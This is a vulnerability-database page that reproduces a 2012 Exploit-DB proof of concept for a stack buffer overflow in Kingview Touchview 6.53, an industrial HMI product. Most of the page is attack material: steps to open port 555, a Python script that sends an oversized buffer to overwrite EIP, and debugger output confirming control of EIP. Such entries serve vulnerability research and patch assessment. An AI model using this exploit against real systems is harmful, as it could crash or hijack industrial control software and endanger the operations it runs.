Lucene search
K
Catalog
Vendors
Products
Timeline
Vulnerabilities
Sources
Documentation
Blog
Glossary
FAQ
Brand assets
Assessment
Agents dashboard
Agent Scanning
API Scanning
Assessment API
Alerts
Email notifications
Webhook notifications
Alerts API
SBOM package analysis
API Reference
Support
Settings
Sign in

Kingview Touchview 6.53 - EIP Overwrite

🗓️ 25 Jun 2012 00:00:00Reported by Carlos Mario Penagos HollmannType 
exploitdb
 exploitdb🔗 www.exploit-db.com👁 36 Views

Kingview Touchview 6.53 EIP Overwrite, Network Configuration, Demo Port 55

Code
# Exploit Title: Kingview Touchview  EIP direct control
# Date: June 24 2012
# Exploit Author: Carlos Mario Penagos Hollmann
# Vendor Homepage: www.kingview.com

# Version: 6.53
# Tested on: Windows SP 1
# CVE :

Open kingivew click on Make choose network configuration--->network
parameter , then  go to the node type and choose Local is a Login Server,
run the demo port 555 will be open.
NOTE:
This was already patched by the vendor silently.

import os
import socket
import sys

host ="10.0.2.15"
port = 555

exploit = ("\x90"*1024)
exploit += ("A"*23976)
exploit += ("B"*12500)
exploit += ("D"*6250)
exploit += ("E"*6002)
exploit += ("\x44\x43\x42\x41")
exploit += ("\x90"*256)
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((host,port))
s.send(exploit)
data = s.recv(1024)
print "  [+] Closing connection.."
s.close()
print "  [+] Done!"


eax=7ffdf000 ebx=00000000 ecx=40000000 edx=00000008 esi=41424344
edi=0012f6b4
eip=41424344 esp=0012f650 ebp=0012f678 iopl=0         nv up ei pl nz na po
nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000
efl=00010202
41424344 ??
CALL TO STACK
0x41424344
USER32!GetDC+0x6d
USER32!EnumDisplaySettingsA+0x27d
USER32!EnumDisplaySettingsA+0xc9
USER32!DefDlgProcA+0x22

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

Book a live demo
25 Jun 2012 00:00Current
7High risk
Vulners AI Score7
kingviewtouchvieweip overwritenetwork configurationdemo port 555windows sp 1silently patchedbuffer overflowvendor patchedexploit code
36